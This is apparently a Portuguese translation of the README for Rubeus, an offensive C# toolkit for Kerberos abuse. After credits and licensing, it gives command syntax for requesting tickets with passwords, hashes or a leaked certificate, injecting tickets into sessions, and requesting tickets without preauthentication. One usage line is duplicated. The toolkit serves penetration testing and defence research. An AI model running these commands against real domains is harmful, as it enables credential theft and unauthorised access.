
Tentando domar o cão de três cabeças.
Rubeus é um conjunto de ferramentas C# para interação bruta com Kerberos e abusos. É fortemente adaptado do projeto Kekeo de Benjamin Delpy (licença CC BY-NC-SA 4.0) e do projeto MakeMeEnterpriseAdmin de Vincent LE TOUX (licença GPL v3.0). Todo o crédito vai para Benjamin e Vincent por resolverem os componentes difíceis da weaponização — sem o trabalho anterior deles este projeto não existiria.
Charlie Clark e Ceri Coburn ambos fizeram contribuições significativas como codesenvolvedores da base de código do Rubeus. Elad Shamir contribuiu com trabalho essencial para delegação restrita baseada em recursos. O trabalho deles é muito apreciado!
Rubeus também usa uma biblioteca de análise/codificação ASN.1 em C# de Thomas Pornin chamada DDer, lançada com uma licença "tipo MIT". Muito obrigado a Thomas por seu código limpo e estável!
Código PKINIT fortemente adaptado da ferramenta Bruce de @SteveSyfuhs. Bruce tornou RFC4556 (PKINIT) muito mais fácil de entender. Muito obrigado a Steve!
A codificação e decodificação NDR para PAC Kerberos é baseada na biblioteca NtApiDotNet de @tiraniddo, obrigado James.
O método KerberosRequestorSecurityToken.GetRequest para Kerberoasting foi contribuído para o PowerView (e depois incorporado ao Rubeus) por @machosec.
@harmj0y é o autor principal desta base de código.
Rubeus está licenciado sob a licença BSD 3-Clause.
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
Requisições e renovações de tickets:
Recupere um TGT baseado em senha/hash de usuário, opcionalmente salvando em um arquivo ou aplicando à sessão de logon atual ou a um LUID específico:
Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Recupere um TGT baseado em senha/hash de usuário, opcionalmente salvando em um arquivo ou aplicando à sessão de logon atual ou a um LUID específico:
Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Recupere um TGT baseado em senha/hash de usuário, inicie um processo /netonly e aplique o ticket ao novo processo/sessão de logon:
Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Recupere um TGT usando um certificado PCKS12, inicie um processo /netonly e aplique o ticket ao novo processo/sessão de logon:
Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Recupere um TGT usando um certificado do keystore do usuário (Smartcard) especificando a impressão digital ou o assunto do certificado, inicie um processo /netonly e aplique o ticket ao novo processo/sessão de logon:
Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/suppenctype:DES|RC4|AES128|AES256] [/nowrap]
Recupere um TGT adequado para alterar uma conta com senha expirada usando o comando changepw:
Rubeus.exe asktgt /user:USER </password:PASSWORD /changepw [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/proxyurl:https://KDC_PROXY/kdcproxy]
Solicite um TGT sem enviar dados de pré-autenticação:
Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]
Solicite um ticket de serviço usando um AS-REQ:
Rubeus.exe asktgt /user:USER /service:SPN </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]